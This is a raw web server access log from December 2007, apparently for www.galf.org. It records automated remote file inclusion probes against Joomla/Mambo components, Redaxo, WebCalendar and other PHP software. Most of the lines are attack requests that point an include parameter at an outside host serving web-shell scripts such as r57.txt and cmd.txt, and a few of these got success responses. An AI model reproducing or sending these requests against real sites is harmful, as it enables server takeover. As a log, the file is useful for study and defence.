218.38.58.151 - - [23/Dec/2007:16:23:44 -0800] "GET /logs/access_070806.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.58.151 - - [23/Dec/2007:16:23:45 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.162.119 - - [23/Dec/2007:16:23:45 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.58.151 - - [23/Dec/2007:16:23:45 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.30.216.95 - - [23/Dec/2007:16:23:56 -0800] "GET /logs/access_071015.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
83.98.196.2 - - [23/Dec/2007:16:24:15 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://222.122.158.214/bbs1/skin/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
83.98.196.2 - - [23/Dec/2007:16:24:15 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://222.122.158.214/bbs1/skin/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
81.52.241.10 - - [23/Dec/2007:16:25:10 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.52.241.10 - - [23/Dec/2007:16:25:11 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.52.241.10 - - [23/Dec/2007:16:25:11 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:16:26:15 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:16:26:15 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
194.95.66.26 - - [23/Dec/2007:16:26:45 -0800] "GET /webcalendar/tools/send_reminders.php?=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.123.207.130 - - [23/Dec/2007:16:26:54 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.123.207.130 - - [23/Dec/2007:16:26:54 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.123.207.130 - - [23/Dec/2007:16:26:54 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.123.207.130 - - [23/Dec/2007:16:26:54 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.44.162.119 - - [23/Dec/2007:16:28:12 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://curraro.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.162.119 - - [23/Dec/2007:16:28:12 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://curraro.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.36.144.9 - - [23/Dec/2007:16:28:21 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.galf.org"
207.44.162.119 - - [23/Dec/2007:16:28:30 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://curraro.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
194.95.66.26 - - [23/Dec/2007:16:32:25 -0800] "GET /logs/access_071203.log/webcalendar/tools/send_reminders.php?=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.95.66.26 - - [23/Dec/2007:16:32:25 -0800] "GET /webcalendar/tools/send_reminders.php?=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.95.66.26 - - [23/Dec/2007:16:32:25 -0800] "GET /logs/webcalendar/tools/send_reminders.php?=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.95.66.26 - - [23/Dec/2007:16:33:33 -0800] "GET /logs/access.log/webcalendar/tools/send_reminders.php?=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.26.63.10 - - [23/Dec/2007:16:34:15 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://pawang.in/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.26.63.10 - - [23/Dec/2007:16:34:15 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://pawang.in/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
201.17.3.26 - - [23/Dec/2007:16:34:22 -0800] "GET /index.php?page=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
201.17.3.26 - - [23/Dec/2007:16:34:22 -0800] "GET /logs/index.php?page=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
81.21.78.60 - - [23/Dec/2007:16:35:57 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.78.60 - - [23/Dec/2007:16:35:57 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.244.151.79 - - [23/Dec/2007:16:36:12 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.244.151.79 - - [23/Dec/2007:16:36:12 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.122.25 - - [23/Dec/2007:16:38:55 -0800] "GET /logs/index.php?include=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.122.25 - - [23/Dec/2007:16:38:55 -0800] "GET /index.php?include=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.162 - - [23/Dec/2007:16:43:42 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.117.17.226 - - [23/Dec/2007:16:44:04 -0800] "GET //components/com_webring/admin.webring.docs.php?component_dir=http://www.logosmin.org/copiedoldsite/components/com_magazine/layouts/css/.contr_css/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
87.117.17.226 - - [23/Dec/2007:16:44:06 -0800] "GET /logs//components/com_webring/admin.webring.docs.php?component_dir=http://www.logosmin.org/copiedoldsite/components/com_magazine/layouts/css/.contr_css/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
65.55.212.145 - - [23/Dec/2007:16:44:11 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.212.145 - - [23/Dec/2007:16:44:16 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 2697395 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.212.145 - - [23/Dec/2007:16:44:23 -0800] "GET /logs/access_070723.log HTTP/1.0" 200 4087522 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.212.145 - - [23/Dec/2007:16:44:34 -0800] "GET /logs/access_071203.log HTTP/1.0" 200 6874512 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
201.34.32.66 - - [23/Dec/2007:16:45:18 -0800] "GET /logs/access_070827.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.hobbiz.com/images/powered/_vti_cnf/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.34.32.66 - - [23/Dec/2007:16:46:16 -0800] "GET /logs/access_070917.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.hobbiz.com/images/powered/_vti_cnf/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.26.63.10 - - [23/Dec/2007:16:47:03 -0800] "GET /logs/access_070917.log//?mosConfig_absolute_path=http://www.pawang.in/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.26.63.10 - - [23/Dec/2007:16:47:04 -0800] "GET //?mosConfig_absolute_path=http://www.pawang.in/r57.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
64.26.63.10 - - [23/Dec/2007:16:47:04 -0800] "GET /logs//?mosConfig_absolute_path=http://www.pawang.in/r57.txt?? HTTP/1.1" 200 5519 "-" "libwww-perl/5.805" "www.galf.org"
64.26.63.10 - - [23/Dec/2007:16:47:21 -0800] "GET /logs/access_070806.log//?mosConfig_absolute_path=http://www.pawang.in/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.22.162 - - [23/Dec/2007:16:47:40 -0800] "GET /logs/access_071028.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:16:47:54 -0800] "GET /logs/access_071105.log/main.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:16:47:54 -0800] "GET /main.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:16:47:54 -0800] "GET /logs/main.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.216.100 - - [23/Dec/2007:16:48:42 -0800] "GET /logs/access_071210.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
91.121.101.67 - - [23/Dec/2007:16:49:35 -0800] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:16:51:04 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:16:51:05 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
91.121.101.67 - - [23/Dec/2007:16:53:07 -0800] "GET /logs/access_071029.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.101.67 - - [23/Dec/2007:16:53:07 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.142.226 - - [23/Dec/2007:16:54:40 -0800] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [23/Dec/2007:16:55:05 -0800] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.34.32.66 - - [23/Dec/2007:16:56:16 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hobbiz.com/images/powered/_vti_cnf/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.245.146 - - [23/Dec/2007:16:56:30 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "www.galf.org"
62.111.179.200 - - [23/Dec/2007:16:57:57 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.111.179.200 - - [23/Dec/2007:16:57:59 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.111.179.200 - - [23/Dec/2007:16:58:00 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.142.226 - - [23/Dec/2007:17:00:15 -0800] "GET /logs/access_071029.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.142.226 - - [23/Dec/2007:17:00:15 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.249.73.202 - - [23/Dec/2007:17:00:24 -0800] "GET /logs/access_071203.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
216.246.99.64 - - [23/Dec/2007:17:00:48 -0800] "GET /logs/access_071029.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [23/Dec/2007:17:00:48 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.55.208.232 - - [23/Dec/2007:17:01:31 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.232 - - [23/Dec/2007:17:01:32 -0800] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
194.183.224.104 - - [23/Dec/2007:17:01:46 -0800] "GET /logs/access_071015.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.183.224.104 - - [23/Dec/2007:17:01:46 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.183.224.104 - - [23/Dec/2007:17:01:46 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:17:02:13 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:17:02:13 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
72.30.215.76 - - [23/Dec/2007:17:03:49 -0800] "GET /logs/access_071029.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:07:54 -0800] "GET /logs/access_070917.log//login.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:07:54 -0800] "GET //login.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:07:55 -0800] "GET /logs//login.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:07:58 -0800] "GET /logs/access_071014.log//login.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.53.147.60 - - [23/Dec/2007:17:08:02 -0800] "GET /administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.djspower.de/cms//components/com_forum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
208.53.147.60 - - [23/Dec/2007:17:08:04 -0800] "GET /logs/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.djspower.de/cms//components/com_forum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:17:10:31 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:17:10:31 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
193.242.108.82 - - [23/Dec/2007:17:13:00 -0800] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
193.242.108.82 - - [23/Dec/2007:17:13:00 -0800] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
84.234.70.210 - - [23/Dec/2007:17:13:21 -0800] "GET /voir.php?inc=http://br.geocities.com/dd3str0y3r/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.34.177.135 - - [23/Dec/2007:17:18:33 -0800] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
64.34.177.135 - - [23/Dec/2007:17:18:33 -0800] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
201.34.32.66 - - [23/Dec/2007:17:18:57 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hobbiz.com/images/powered/_vti_cnf/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.34.32.66 - - [23/Dec/2007:17:18:58 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hobbiz.com/images/powered/_vti_cnf/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.249.73.202 - - [23/Dec/2007:17:21:46 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.202 - - [23/Dec/2007:17:21:46 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.212.145 - - [23/Dec/2007:17:22:04 -0800] "GET /logs/access_070604.log HTTP/1.0" 200 311019 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.30.216.93 - - [23/Dec/2007:17:26:02 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:17:26:35 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:17:26:36 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
72.30.216.8 - - [23/Dec/2007:17:27:24 -0800] "GET /logs/access.log HTTP/1.0" 200 49247 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:29:06 -0800] "GET /logs/access_071029.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:29:06 -0800] "GET //skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
